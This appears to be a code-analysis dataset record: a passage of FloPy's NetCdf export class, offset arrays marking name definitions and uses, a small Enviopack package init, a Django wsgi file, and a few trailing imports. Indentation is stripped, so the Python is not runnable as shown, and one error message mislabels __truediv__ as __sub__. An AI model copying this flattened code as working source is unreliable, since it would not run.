for vname in self.var_attr_dict.keys():
new_net.nc.variables[vname][:] = (
self.nc.variables[vname][:] * other
)
elif isinstance(other, NetCdf):
for vname in self.var_attr_dict.keys():
new_net.nc.variables[vname][:] = (
self.nc.variables[vname][:] * other.nc.variables[vname][:]
)
else:
raise Exception(
"NetCdf.__mul__(): unrecognized other:{0}".format(
str(type(other))
)
)
return new_net
def __div__(self, other):
return self.__truediv__(other)
def __truediv__(self, other):
new_net = NetCdf.zeros_like(self)
with np.errstate(invalid="ignore"):
if np.isscalar(other) or isinstance(other, np.ndarray):
for vname in self.var_attr_dict.keys():
new_net.nc.variables[vname][:] = (
self.nc.variables[vname][:] / other
)
elif isinstance(other, NetCdf):
for vname in self.var_attr_dict.keys():
new_net.nc.variables[vname][:] = (
self.nc.variables[vname][:]
/ other.nc.variables[vname][:]
)
else:
raise Exception(
"NetCdf.__sub__(): unrecognized other:{0}".format(
str(type(other))
)
)
return new_net
def append(self, other, suffix="_1"):
assert isinstance(other, NetCdf) or isinstance(other, dict)
if isinstance(other, NetCdf):
for vname in other.var_attr_dict.keys():
attrs = other.var_attr_dict[vname].copy()
var = other.nc.variables[vname]
new_vname = vname
if vname in self.nc.variables.keys():
if vname not in STANDARD_VARS:
new_vname = vname + suffix
if "long_name" in attrs:
attrs["long_name"] += " " + suffix
else:
continue
assert (
new_vname not in self.nc.variables.keys()
), "var already exists:{0} in {1}".format(
new_vname, ",".join(self.nc.variables.keys())
)
attrs["max"] = var[:].max()
attrs["min"] = var[:].min()
new_var = self.create_variable(
new_vname, attrs, var.dtype, dimensions=var.dimensions
)
new_var[:] = var[:]
else:
for vname, array in other.items():
vname_norm = self.normalize_name(vname)
assert (
vname_norm in self.nc.variables.keys()
), "dict var not in " "self.vars:{0}-->".format(
vname
) + ",".join(
self.nc.variables.keys()
)
new_vname = vname_norm + suffix
assert new_vname not in self.nc.variables.keys()
attrs = self.var_attr_dict[vname_norm].copy()
attrs["max"] = np.nanmax(array)
attrs["min"] = np.nanmin(array)
attrs["name"] = new_vname
attrs["long_name"] = attrs["long_name"] + " " + suffix
var = self.nc.variables[vname_norm]
# assert var.shape == array.shape,\
# "{0} shape ({1}) doesn't make array shape ({2})".\
# format(new_vname,str(var.shape),str(array.shape))
new_var = self.create_variable(
new_vname, attrs, var.dtype, dimensions=var.dimensions
)
try:
new_var[:] = array
except:
new_var[:, 0] = array
return
def copy(self, output_filename):
new_net = NetCdf.zeros_like(self, output_filename=output_filename)
for vname in self.var_attr_dict.keys():
new_net.nc.variables[vname][:] = self.nc.variables[vname][:]
return new_net
@classmethod
def zeros_like(
cls, other, output_filename=None, verbose=None, logger=None
):
new_net = NetCdf.empty_like(
other,
output_filename=output_filename,
verbose=verbose,
logger=logger,
)
# add the vars to the instance
for vname in other.var_attr_dict.keys():
if new_net.nc.variables.get(vname) is not None:
new_net.logger.warn(
"variable {0} already defined, skipping".format(vname)
)
continue
new_net.log("adding variable {0}".format(vname))
var = other.nc.variables[vname]
data = var[:]
try:
mask = data.mask
data = np.array(data)
except:
mask = None
new_data = np.zeros_like(data)
new_data[mask] = FILLVALUE
new_var = new_net.create_variable(
vname,
other.var_attr_dict[vname],
var.dtype,
dimensions=var.dimensions,
)
new_var[:] = new_data
new_net.log("adding variable {0}".format(vname))
global_attrs = {}
for attr in other.nc.ncattrs():
if attr not in new_net.nc.ncattrs():
global_attrs[attr] = other.nc[attr]
new_net.add_global_attributes(global_attrs)
return new_net
@classmethod
def empty_like(
cls, other, output_filename=None, verbose=None, logger=None
):
if output_filename is None:
output_filename = (
str(time.mktime(datetime.now().timetuple())) + ".nc"
)
while os.path.exists(output_filename):
print("{}...already exists".format(output_filename))
output_filename = (
str(time.mktime(datetime.now().timetuple())) + ".nc"
)
print(
"creating temporary netcdf file..."
+ "{}".format(output_filename)
)
new_net = cls(
output_filename,
other.model,
time_values=other.time_values_arg,
verbose=verbose,
logger=logger,
)
return new_net
def difference(
self, other, minuend="self", mask_zero_diff=True, onlydiff=True
):
"""
make a new NetCDF instance that is the difference with another
netcdf file
Parameters
----------
other : either an str filename of a netcdf file or
a netCDF4 instance
minuend : (optional) the order of the difference operation.
Default is self (e.g. self - other). Can be "self" or "other"
mask_zero_diff : bool flag to mask differences that are zero. If
True, positions in the difference array that are zero will be set
to self.fillvalue
only_diff : bool flag to only add non-zero diffs to output file
Returns
-------
net NetCDF instance
Notes
-----
assumes the current NetCDF instance has been populated. The
variable names and dimensions between the two files must match
exactly. The name of the new .nc file is
<self.output_filename>.diff.nc. The masks from both self and
other are carried through to the new instance
"""
assert self.nc is not None, (
"can't call difference() if nc " + "hasn't been populated"
)
try:
import netCDF4
except Exception as e:
mess = "error import netCDF4: {0}".format(str(e))
self.logger.warn(mess)
raise Exception(mess)
if isinstance(other, str):
assert os.path.exists(
other
), "filename 'other' not found:" + "{0}".format(other)
other = netCDF4.Dataset(other, "r")
assert isinstance(other, netCDF4.Dataset)
# check for similar variables
self_vars = set(self.nc.variables.keys())
other_vars = set(other.variables)
diff = self_vars.symmetric_difference(other_vars)
if len(diff) > 0:
self.logger.warn(
"variables are not the same between the two "
+ "nc files: "
+ ",".join(diff)
)
return
# check for similar dimensions
self_dimens = self.nc.dimensions
other_dimens = other.dimensions
for d in self_dimens.keys():
if d not in other_dimens:
self.logger.warn("missing dimension in other:{0}".format(d))
return
if len(self_dimens[d]) != len(other_dimens[d]):
self.logger.warn(
"dimension not consistent: "
+ "{0}:{1}".format(self_dimens[d], other_dimens[d])
)
return
# should be good to go
time_values = self.nc.variables.get("time")[:]
new_net = NetCdf(
self.output_filename.replace(".nc", ".diff.nc"),
self.model,
time_values=time_values,
)
# add the vars to the instance
for vname in self_vars:
if (
vname not in self.var_attr_dict
or new_net.nc.variables.get(vname) is not None
):
self.logger.warn("skipping variable: {0}".format(vname))
continue
self.log("processing variable {0}".format(vname))
s_var = self.nc.variables[vname]
o_var = other.variables[vname]
s_data = s_var[:]
o_data = o_var[:]
o_mask, s_mask = None, None
# keep the masks to apply later
if isinstance(s_data, np.ma.MaskedArray):
self.logger.warn("masked array for {0}".format(vname))
s_mask = s_data.mask
s_data = np.array(s_data)
s_data[s_mask] = 0.0
else:
np.nan_to_num(s_data)
if isinstance(o_data, np.ma.MaskedArray):
o_mask = o_data.mask
o_data = np.array(o_data)
o_data[o_mask] = 0.0
else:
np.nan_to_num(o_data)
# difference with self
if minuend.lower() == "self":
d_data = s_data - o_data
elif minuend.lower() == "other":
d_data = o_data - s_data
else:
mess = "unrecognized minuend {0}".format(minuend)
self.logger.warn(mess)
raise Exception(mess)
# check for non-zero diffs
if onlydiff and d_data.sum() == 0.0:
self.logger.warn(
"var {0} has zero differences, skipping...".format(vname)
)
continue
self.logger.warn(
"resetting diff attrs max,min:{0},{1}".format(
d_data.min(), d_data.max()
)
)
attrs = self.var_attr_dict[vname].copy()
attrs["max"] = np.nanmax(d_data)
attrs["min"] = np.nanmin(d_data)
# reapply masks
if s_mask is not None:
self.log("applying self mask")
s_mask[d_data != 0.0] = False
d_data[s_mask] = FILLVALUE
self.log("applying self mask")
if o_mask is not None:
self.log("applying other mask")
o_mask[d_data != 0.0] = False
d_data[o_mask] = FILLVALUE
self.log("applying other mask")
d_data[np.isnan(d_data)] = FILLVALUE
if mask_zero_diff:
d_data[np.where(d_data == 0.0)] = FILLVALUE
var = new_net.create_variable(
vname, attrs, s_var.dtype, dimensions=s_var.dimensions
)
var[:] = d_data
self.log("processing variable {0}".format(vname))
def _dt_str(self, dt):
""" for datetime to string for year < 1900
"""
dt_str = "{0:04d}-{1:02d}-{2:02d}T{3:02d}:{4:02d}:{5:02}Z".format(
dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second
)
return dt_str
def write(self):
"""write the nc object to disk"""
self.log("writing nc file")
assert (
self.nc is not None
), "netcdf.write() error: nc file not initialized"
# write any new attributes that have been set since
# initializing the file
for k, v in self.global_attributes.items():
try:
if self.nc.attributes.get(k) is not None:
self.nc.setncattr(k, v)
except Exception:
self.logger.warn(
"error setting global attribute {0}".format(k)
)
self.nc.sync()
self.nc.close()
self.log("writing nc file")
def _initialize_attributes(self):
"""private method to initial the attributes
of the NetCdf instance
"""
assert (
"nc" not in self.__dict__.keys()
), "NetCdf._initialize_attributes() error: nc attribute already set"
self.nc_epsg_str = "epsg:4326"
self.nc_crs_longname = "http://www.opengis.net/def/crs/EPSG/0/4326"
self.nc_semi_major = float(6378137.0)
self.nc_inverse_flat = float(298.257223563)
self.global_attributes = {}
self.global_attributes["namefile"] = self.model.namefile
self.global_attributes["model_ws"] = self.model.model_ws
self.global_attributes["exe_name"] = self.model.exe_name
self.global_attributes["modflow_version"] = self.model.version
self.global_attributes["create_hostname"] = socket.gethostname()
self.global_attributes["create_platform"] = platform.system()
self.global_attributes["create_directory"] = os.getcwd()
htol, rtol = -999, -999
try:
htol, rtol = self.model.solver_tols()
except Exception as e:
self.logger.warn(
"unable to get solver tolerances:" + "{0}".format(str(e))
)
self.global_attributes["solver_head_tolerance"] = htol
self.global_attributes["solver_flux_tolerance"] = rtol
spatial_attribs = {
"xll": self.model_grid.xoffset,
"yll": self.model_grid.yoffset,
"rotation": self.model_grid.angrot,
"proj4_str": self.model_grid.proj4,
}
for n, v in spatial_attribs.items():
self.global_attributes["flopy_sr_" + n] = v
self.global_attributes[
"start_datetime"
] = self.model_time.start_datetime
self.fillvalue = FILLVALUE
# initialize attributes
self.grid_crs = None
self.zs = None
self.ys = None
self.xs = None
self.nc = None
def initialize_geometry(self):
""" initialize the geometric information
needed for the netcdf file
"""
try:
import pyproj
except ImportError as e:
raise ImportError(
"NetCdf error importing pyproj module:\n" + str(e)
)
from distutils.version import LooseVersion
# Check if using newer pyproj version conventions
pyproj220 = LooseVersion(pyproj.__version__) >= LooseVersion("2.2.0")
proj4_str = self.proj4_str
print("initialize_geometry::proj4_str = {}".format(proj4_str))
self.log("building grid crs using proj4 string: {}".format(proj4_str))
if pyproj220:
self.grid_crs = pyproj.CRS(proj4_str)
else:
self.grid_crs = pyproj.Proj(proj4_str, preserve_units=True)
print("initialize_geometry::self.grid_crs = {}".format(self.grid_crs))
vmin, vmax = self.model_grid.botm.min(), self.model_grid.top.max()
if self.z_positive == "down":
vmin, vmax = vmax, vmin
else:
self.zs = self.model_grid.xyzcellcenters[2].copy()
ys = self.model_grid.xyzcellcenters[1].copy()
xs = self.model_grid.xyzcellcenters[0].copy()
# Transform to a known CRS
if pyproj220:
nc_crs = pyproj.CRS(self.nc_epsg_str)
self.transformer = pyproj.Transformer.from_crs(
self.grid_crs, nc_crs, always_xy=True
)
else:
nc_crs = pyproj.Proj(self.nc_epsg_str)
self.transformer = None
print("initialize_geometry::nc_crs = {}".format(nc_crs))
if pyproj220:
print(
"transforming coordinates using = {}".format(self.transformer)
)
self.log("projecting grid cell center arrays")
if pyproj220:
self.xs, self.ys = self.transformer.transform(xs, ys)
else:
self.xs, self.ys = pyproj.transform(self.grid_crs, nc_crs, xs, ys)
# get transformed bounds and record to check against ScienceBase later
xmin, xmax, ymin, ymax = self.model_grid.extent
bbox = np.array(
[[xmin, ymin], [xmin, ymax], [xmax, ymax], [xmax, ymin]]
)
if pyproj220:
x, y = self.transformer.transform(*bbox.transpose())
else:
x, y = pyproj.transform(self.grid_crs, nc_crs, *bbox.transpose())
self.bounds = x.min(), y.min(), x.max(), y.max()
self.vbounds = vmin, vmax
def initialize_file(self, time_values=None):
"""
initialize the netcdf instance, including global attributes,
dimensions, and grid information
Parameters
----------
time_values : list of times to use as time dimension
entries. If none, then use the times in
self.model.dis.perlen and self.start_datetime
"""
if self.nc is not None:
raise Exception("nc file already initialized")
if self.grid_crs is None:
self.log("initializing geometry")
self.initialize_geometry()
self.log("initializing geometry")
try:
import netCDF4
except Exception as e:
self.logger.warn("error importing netCDF module")
msg = "NetCdf error importing netCDF4 module:\n" + str(e)
raise Exception(msg)
# open the file for writing
try:
self.nc = netCDF4.Dataset(self.output_filename, "w")
except Exception as e:
msg = "error creating netcdf dataset:\n{}".format(str(e))
raise Exception(msg)
# write some attributes
self.log("setting standard attributes")
self.nc.setncattr(
"Conventions",
"CF-1.6, ACDD-1.3, flopy {}".format(flopy.__version__),
)
self.nc.setncattr(
"date_created", datetime.utcnow().strftime("%Y-%m-%dT%H:%M:00Z")
)
self.nc.setncattr(
"geospatial_vertical_positive", "{}".format(self.z_positive)
)
min_vertical = np.min(self.zs)
max_vertical = np.max(self.zs)
self.nc.setncattr("geospatial_vertical_min", min_vertical)
self.nc.setncattr("geospatial_vertical_max", max_vertical)
self.nc.setncattr("geospatial_vertical_resolution", "variable")
self.nc.setncattr("featureType", "Grid")
for k, v in self.global_attributes.items():
try:
self.nc.setncattr(k, v)
except:
self.logger.warn(
"error setting global attribute {0}".format(k)
)
self.global_attributes = {}
self.log("setting standard attributes")
# spatial dimensions
self.log("creating dimensions")
# time
if time_values is None:
time_values = np.cumsum(self.model_time.perlen)
self.nc.createDimension("time", len(time_values))
for name, length in zip(self.dimension_names, self.shape):
self.nc.createDimension(name, length)
self.log("creating dimensions")
self.log("setting CRS info")
# Metadata variables
crs = self.nc.createVariable("crs", "i4")
crs.long_name = self.nc_crs_longname
crs.epsg_code = self.nc_epsg_str
crs.semi_major_axis = self.nc_semi_major
crs.inverse_flattening = self.nc_inverse_flat
self.log("setting CRS info")
attribs = {
"units": "{} since {}".format(
self.time_units, self.start_datetime
),
"standard_name": "time",
"long_name": NC_LONG_NAMES.get("time", "time"),
"calendar": "gregorian",
"_CoordinateAxisType": "Time",
}
time = self.create_variable(
"time", attribs, precision_str="f8", dimensions=("time",)
)
self.logger.warn("time_values:{0}".format(str(time_values)))
time[:] = np.asarray(time_values)
# Elevation
attribs = {
"units": self.model_grid.units,
"standard_name": "elevation",
"long_name": NC_LONG_NAMES.get("elevation", "elevation"),
"axis": "Z",
"valid_min": min_vertical,
"valid_max": max_vertical,
"positive": self.z_positive,
}
elev = self.create_variable(
"elevation",
attribs,
precision_str="f8",
dimensions=self.dimension_names,
)
elev[:] = self.zs
# Longitude
attribs = {
"units": "degrees_east",
"standard_name": "longitude",
"long_name": NC_LONG_NAMES.get("longitude", "longitude"),
"axis": "X",
"_CoordinateAxisType": "Lon",
}
lon = self.create_variable(
"longitude",
attribs,
precision_str="f8",
dimensions=self.dimension_names[1:],
)
lon[:] = self.xs
self.log("creating longitude var")
# Latitude
self.log("creating latitude var")
attribs = {
"units": "degrees_north",
"standard_name": "latitude",
"long_name": NC_LONG_NAMES.get("latitude", "latitude"),
"axis": "Y",
"_CoordinateAxisType": "Lat",
}
lat = self.create_variable(
"latitude",
attribs,
precision_str="f8",
dimensions=self.dimension_names[1:],
)
lat[:] = self.ys
# x
self.log("creating x var")
attribs = {
"units": self.model_grid.units,
"standard_name": "projection_x_coordinate",
"long_name": NC_LONG_NAMES.get("x", "x coordinate of projection"),
"axis": "X",
}
x = self.create_variable(
"x_proj",
attribs,
precision_str="f8",
dimensions=self.dimension_names[1:],
)
x[:] = self.model_grid.xyzcellcenters[0]
# y
self.log("creating y var")
attribs = {
"units": self.model_grid.units,
"standard_name": "projection_y_coordinate",
"long_name": NC_LONG_NAMES.get("y", "y coordinate of projection"),
"axis": "Y",
}
y = self.create_variable(
"y_proj",
attribs,
precision_str="f8",
dimensions=self.dimension_names[1:],
)
y[:] = self.model_grid.xyzcellcenters[1]
# grid mapping variable
crs = flopy.utils.reference.crs(
prj=self.model_grid.prj, epsg=self.model_grid.epsg
)
attribs = crs.grid_mapping_attribs
if attribs is not None:
self.log("creating grid mapping variable")
self.create_variable(
attribs["grid_mapping_name"], attribs, precision_str="f8"
)
# layer
self.log("creating layer var")
attribs = {
"units": "",
"standard_name": "layer",
"long_name": NC_LONG_NAMES.get("layer", "layer"),
"positive": "down",
"axis": "Z",
}
lay = self.create_variable("layer", attribs, dimensions=("layer",))
lay[:] = np.arange(0, self.shape[0])
self.log("creating layer var")
if self.model_grid.grid_type == "structured":
# delc
attribs = {
"units": self.model_grid.units.strip("s"),
"long_name": NC_LONG_NAMES.get(
"delc", "Model grid cell spacing along a column"
),
}
delc = self.create_variable("delc", attribs, dimensions=("y",))
delc[:] = self.model_grid.delc[::-1]
if self.model_grid.angrot != 0:
delc.comments = (
"This is the row spacing that applied to the UNROTATED grid. "
+ "This grid HAS been rotated before being saved to NetCDF. "
+ "To compute the unrotated grid, use the origin point and this array."
)
# delr
attribs = {
"units": self.model_grid.units.strip("s"),
"long_name": NC_LONG_NAMES.get(
"delr", "Model grid cell spacing along a row"
),
}
delr = self.create_variable("delr", attribs, dimensions=("x",))
delr[:] = self.model_grid.delr[::-1]
if self.model_grid.angrot != 0:
delr.comments = (
"This is the col spacing that applied to the UNROTATED grid. "
+ "This grid HAS been rotated before being saved to NetCDF. "
+ "To compute the unrotated grid, use the origin point and this array."
)
# else:
# vertices
# attribs = {"units": self.model_grid.lenuni.strip('s'),
# "long_name": NC_LONG_NAMES.get("vertices",
# "List of vertices used in the model by cell"),
# }
# vertices = self.create_variable('vertices', attribs, dimensions=('ncpl',))
# vertices[:] = self.model_grid.vertices
# Workaround for CF/CDM.
# http://www.unidata.ucar.edu/software/thredds/current/netcdf-java/
# reference/StandardCoordinateTransforms.html
# "explicit_field"
exp = self.nc.createVariable("VerticalTransform", "S1")
exp.transform_name = "explicit_field"
exp.existingDataField = "elevation"
exp._CoordinateTransformType = "vertical"
exp._CoordinateAxes = "layer"
return
def initialize_group(
self,
group="timeseries",
dimensions=("time",),
attributes=None,
dimension_data=None,
):
"""
Method to initialize a new group within a netcdf file. This group
can have independent dimensions from the global dimensions
Parameters:
----------
name : str
name of the netcdf group
dimensions : tuple
data dimension names for group
dimension_shape : tuple
tuple of data dimension lengths
attributes : dict
nested dictionary of {dimension : {attributes}} for each netcdf
group dimension
dimension_data : dict
dictionary of {dimension : [data]} for each netcdf group dimension
"""
if attributes is None:
attributes = {}
if dimension_data is None:
dimension_data = {}
if self.nc is None:
self.initialize_file()
if group in self.nc.groups:
raise AttributeError("{} group already initialized".format(group))
self.log("creating netcdf group {}".format(group))
self.nc.createGroup(group)
self.log("{} group created".format(group))
self.log("creating {} group dimensions".format(group))
for dim in dimensions:
if dim == "time":
if "time" not in dimension_data:
time_values = np.cumsum(self.model_time.perlen)
else:
time_values = dimension_data["time"]
self.nc.groups[group].createDimension(dim, len(time_values))
else:
if dim not in dimension_data:
raise AssertionError(
"{} information must be supplied "
"to dimension data".format(dim)
)
else:
self.nc.groups[group].createDimension(
dim, len(dimension_data[dim])
)
self.log("created {} group dimensions".format(group))
dim_names = tuple([i for i in dimensions if i != "time"])
for dim in dimensions:
if dim.lower() == "time":
if "time" not in attributes:
unit_value = "{} since {}".format(
self.time_units, self.start_datetime
)
attribs = {
"units": unit_value,
"standard_name": "time",
"long_name": NC_LONG_NAMES.get("time", "time"),
"calendar": "gregorian",
"Axis": "Y",
"_CoordinateAxisType": "Time",
}
else:
attribs = attributes["time"]
time = self.create_group_variable(
group,
"time",
attribs,
precision_str="f8",
dimensions=("time",),
)
time[:] = np.asarray(time_values)
elif dim.lower() == "zone":
if "zone" not in attributes:
attribs = {
"units": "N/A",
"standard_name": "zone",
"long_name": "zonebudget zone",
"Axis": "X",
"_CoordinateAxisType": "Zone",
}
else:
attribs = attributes["zone"]
zone = self.create_group_variable(
group,
"zone",
attribs,
precision_str="i4",
dimensions=("zone",),
)
zone[:] = np.asarray(dimension_data["zone"])
else:
attribs = attributes[dim]
var = self.create_group_variable(
group,
dim,
attribs,
precision_str="f8",
dimensions=dim_names,
)
var[:] = np.asarray(dimension_data[dim])
@staticmethod
def normalize_name(name):
return name.replace(".", "_").replace(" ", "_").replace("-", "_")
def create_group_variable(
self, group, name, attributes, precision_str, dimensions=("time",)
):
"""
Create a new group variable in the netcdf object
Parameters
----------
name : str
the name of the variable
attributes : dict
attributes to add to the new variable
precision_str : str
netcdf-compliant string. e.g. f4
dimensions : tuple
which dimensions the variable applies to
default : ("time","layer","x","y")
group : str
which netcdf group the variable goes in
default : None which creates the variable in root
Returns
-------
nc variable
Raises
------
AssertionError if precision_str not right
AssertionError if variable name already in netcdf object
AssertionError if one of more dimensions do not exist
"""
name = self.normalize_name(name)
if (
name in STANDARD_VARS
and name in self.nc.groups[group].variables.keys()
):
return
if name in self.nc.groups[group].variables.keys():
if self.forgive:
self.logger.warn(
"skipping duplicate {} group variable: {}".format(
group, name
)
)
return
else:
raise Exception(
"duplicate {} group variable name: {}".format(group, name)
)
self.log("creating group {} variable: {}".format(group, name))
if precision_str not in PRECISION_STRS:
raise AssertionError(
"netcdf.create_variable() error: precision "
"string {} not in {}".format(precision_str, PRECISION_STRS)
)
if group not in self.nc.groups:
raise AssertionError(
"netcdf group `{}` must be created before "
"variables can be added to it".format(group)
)
self.var_attr_dict["{}/{}".format(group, name)] = attributes
var = self.nc.groups[group].createVariable(
name,
precision_str,
dimensions,
fill_value=self.fillvalue,
zlib=True,
)
for k, v in attributes.items():
try:
var.setncattr(k, v)
except:
self.logger.warn(
"error setting attribute"
+ "{} for group {} variable {}".format(k, group, name)
)
self.log("creating group {} variable: {}".format(group, name))
return var
def create_variable(
self,
name,
attributes,
precision_str="f4",
dimensions=("time", "layer"),
group=None,
):
"""
Create a new variable in the netcdf object
Parameters
----------
name : str
the name of the variable
attributes : dict
attributes to add to the new variable
precision_str : str
netcdf-compliant string. e.g. f4
dimensions : tuple
which dimensions the variable applies to
default : ("time","layer","x","y")
group : str
which netcdf group the variable goes in
default : None which creates the variable in root
Returns
-------
nc variable
Raises
------
AssertionError if precision_str not right
AssertionError if variable name already in netcdf object
AssertionError if one of more dimensions do not exist
"""
# Normalize variable name
name = self.normalize_name(name)
# if this is a core var like a dimension...
# long_name = attributes.pop("long_name",name)
if name in STANDARD_VARS and name in self.nc.variables.keys():
return
if (
name not in self.var_attr_dict.keys()
and name in self.nc.variables.keys()
):
if self.forgive:
self.logger.warn(
"skipping duplicate variable: {0}".format(name)
)
return
else:
raise Exception("duplicate variable name: {0}".format(name))
if name in self.nc.variables.keys():
raise Exception("duplicate variable name: {0}".format(name))
self.log("creating variable: " + str(name))
assert (
precision_str in PRECISION_STRS
), "netcdf.create_variable() error: precision string {0} not in {1}".format(
precision_str, PRECISION_STRS
)
if self.nc is None:
self.initialize_file()
# check that the requested dimension exists and
# build up the chuck sizes
# chunks = []
# for dimension in dimensions:
# assert self.nc.dimensions.get(dimension) is not None, \
# "netcdf.create_variable() dimension not found:" + dimension
# chunk = self.chunks[dimension]
# assert chunk is not None, \
# "netcdf.create_variable() chunk size of {0} is None in self.chunks". \
# format(dimension)
# chunks.append(chunk)
self.var_attr_dict[name] = attributes
var = self.nc.createVariable(
name,
precision_str,
dimensions,
fill_value=self.fillvalue,
zlib=True,
) # ,
# chunksizes=tuple(chunks))
for k, v in attributes.items():
try:
var.setncattr(k, v)
except:
self.logger.warn(
"error setting attribute"
+ "{0} for variable {1}".format(k, name)
)
self.log("creating variable: " + str(name))
return var
def add_global_attributes(self, attr_dict):
""" add global attribute to an initialized file
Parameters
----------
attr_dict : dict(attribute name, attribute value)
Returns
-------
None
Raises
------
Exception of self.nc is None (initialize_file()
has not been called)
"""
if self.nc is None:
# self.initialize_file()
mess = (
"NetCDF.add_global_attributes() should only "
+ "be called after the file has been initialized"
)
self.logger.warn(mess)
raise Exception(mess)
self.log("setting global attributes")
self.nc.setncatts(attr_dict)
self.log("setting global attributes")
def add_sciencebase_metadata(self, id, check=True):
"""Add metadata from ScienceBase using the
flopy.export.metadata.acdd class.
Returns
-------
metadata : flopy.export.metadata.acdd object
"""
md = acdd(id, model=self.model)
if md.sb is not None:
if check:
self._check_vs_sciencebase(md)
# get set of public attributes
attr = {n for n in dir(md) if "_" not in n[0]}
# skip some convenience attributes
skip = {
"bounds",
"creator",
"sb",
"xmlroot",
"time_coverage",
"get_sciencebase_xml_metadata",
"get_sciencebase_metadata",
}
towrite = sorted(list(attr.difference(skip)))
for k in towrite:
v = md.__getattribute__(k)
if v is not None:
# convert everything to strings
if not isinstance(v, str):
if isinstance(v, list):
v = ",".join(v)
else:
v = str(v)
self.global_attributes[k] = v
self.nc.setncattr(k, v)
self.write()
return md
def _check_vs_sciencebase(self, md):
"""Check that model bounds read from flopy are consistent with those in ScienceBase."""
xmin, ymin, xmax, ymax = self.bounds
tol = 1e-5
assert md.geospatial_lon_min - xmin < tol
assert md.geospatial_lon_max - xmax < tol
assert md.geospatial_lat_min - ymin < tol
assert md.geospatial_lat_max - ymax < tol
assert md.geospatial_vertical_min - self.vbounds[0] < tol
assert md.geospatial_vertical_max - self.vbounds[1] < tol
def get_longnames_from_docstrings(self, outfile="longnames.json"):
"""
This is experimental.
Scrape Flopy module docstrings and return docstrings for parameters
included in the list of variables added to NetCdf object. Create
a dictionary of longnames keyed by the NetCdf variable names; make each
longname from the first sentence of the docstring for that parameter.
One major limitation is that variables from mflists often aren't described
in the docstrings.
"""
def startstop(ds):
"""Get just the Parameters section of the docstring."""
start, stop = 0, -1
for i, l in enumerate(ds):
if "Parameters" in l and "----" in ds[i + 1]:
start = i + 2
if l.strip() in ["Attributes", "Methods", "Returns", "Notes"]:
stop = i - 1
break
if i >= start and "----" in l:
stop = i - 2
break
return start, stop
def get_entries(ds):
"""Parse docstring entries into dictionary."""
stuff = {}
k = None
for line in ds:
if (
len(line) >= 5
and line[:4] == " " * 4
and line[4] != " "
and ":" in line
):
k = line.split(":")[0].strip()
stuff[k] = ""
# lines with parameter descriptions
elif k is not None and len(line) > 10: # avoid orphans
stuff[k] += line.strip() + " "
return stuff
# get a list of the flopy classes
# packages = inspect.getmembers(flopy.modflow, inspect.isclass)
packages = [(pp.name[0], pp) for pp in self.model.packagelist]
# get a list of the NetCDF variables
attr = [v.split("_")[-1] for v in self.nc.variables]
# parse docstrings to get long names
longnames = {}
for pkg in packages:
# parse the docstring
obj = pkg[-1]
ds = obj.__doc__.split("\n")
start, stop = startstop(ds)
txt = ds[start:stop]
if stop - start > 0:
params = get_entries(txt)
for k, v in params.items():
if k in attr:
longnames[k] = v.split(". ")[0]
# add in any variables that weren't found
for var in attr:
if var not in longnames.keys():
longnames[var] = ""
with open(outfile, "w") as output:
json.dump(longnames, output, sort_keys=True, indent=2)
return longnames
| [
[
[
7,
9
],
[
430,
432
],
[
4753,
4755
],
[
4876,
4878
],
[
14922,
14924
],
[
17006,
17008
],
[
23256,
23258
]
],
[
[
17,
25
],
[
23185,
23193
]
],
[
[
33,
39
],
[
23112,
23118
]
],
[
[
47,
51
],
[
2546,
2550
]
],
[
[
59,
63
],
[
519,
523
],
[
51899,
51903
]
],
[
[
71,
82
],
[
7300,
7302
],
[
7340,
7342
],
[
8056,
8058
],
[
8096,
8098
],
[
8812,
8814
],
[
8852,
8854
],
[
9644,
9646
],
[
9690,
9692
],
[
9730,
9732
],
[
12207,
12209
],
[
12255,
12257
],
[
13963,
13965
],
[
14049,
14051
],
[
19051,
19053
],
[
19204,
19206
],
[
19292,
19294
],
[
19349,
19351
],
[
19431,
19433
],
[
19519,
19521
],
[
20404,
20406
],
[
20449,
20451
],
[
20953,
20955
],
[
21037,
21039
],
[
26451,
26453
],
[
28422,
28424
],
[
28461,
28463
],
[
29207,
29209
],
[
30322,
30324
],
[
33662,
33664
],
[
37575,
37577
],
[
39245,
39247
],
[
39980,
39982
],
[
40332,
40334
]
],
[
[
104,
112
],
[
1568,
1576
],
[
1906,
1914
],
[
2764,
2772
],
[
14856,
14864
],
[
15084,
15092
],
[
28230,
28238
]
],
[
[
120,
124
],
[
14844,
14848
],
[
15072,
15076
]
],
[
[
147,
151
],
[
47555,
47559
]
],
[
[
159,
164
],
[
28145,
28150
],
[
32949,
32954
]
],
[
[
176,
185
],
[
14098,
14107
],
[
20656,
20665
],
[
20875,
20884
],
[
20973,
20982
],
[
21064,
21073
],
[
24092,
24101
]
],
[
[
197,
203
]
],
[
[
313,
327
],
[
42177,
42191
],
[
42348,
42362
],
[
45118,
45132
],
[
45245,
45259
]
],
[
[
350,
363
],
[
5377,
5390
],
[
10883,
10896
],
[
41524,
41537
],
[
44440,
44453
]
],
[
[
423,
427
],
[
467,
471
]
],
[
[
496,
497
],
[
529,
530
]
],
[
[
503,
516
],
[
29993,
30006
],
[
30498,
30511
],
[
31038,
31051
],
[
31587,
31600
],
[
32097,
32110
],
[
32596,
32609
],
[
33465,
33478
],
[
33915,
33928
],
[
34646,
34659
],
[
38713,
38726
]
],
[
[
540,
546
],
[
4659,
4665
]
],
[
[
2933,
2939
],
[
7265,
7271
],
[
7561,
7567
],
[
8021,
8027
],
[
8317,
8323
],
[
8777,
8783
],
[
9073,
9079
],
[
9607,
9613
],
[
9971,
9977
],
[
10526,
10532
],
[
10590,
10596
],
[
12975,
12981
],
[
13307,
13313
],
[
18270,
18276
]
]
] |
# -*- coding: utf-8 -*-
from .Enviopack import Enviopack
from .Auth.Auth import Auth
from .Quote.Quote import Quote
from .Pickings.Pickings import Pickings
from .Orders.Orders import Orders
__version__ = "0.4.6"
__author__ = "Federico Gobea"
| [
[
[
47,
56
]
],
[
[
80,
84
]
],
[
[
110,
115
]
],
[
[
147,
155
]
],
[
[
183,
189
]
],
[
[
191,
202
]
],
[
[
213,
223
]
]
] |
"""
WSGI config for billsengine_31836 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'billsengine_31836.settings')
application = get_wsgi_application()
| [
[
[
240,
242
],
[
295,
297
]
],
[
[
273,
293
],
[
388,
408
]
],
[
[
374,
385
]
]
] |
import requests
import threading
import random
import json
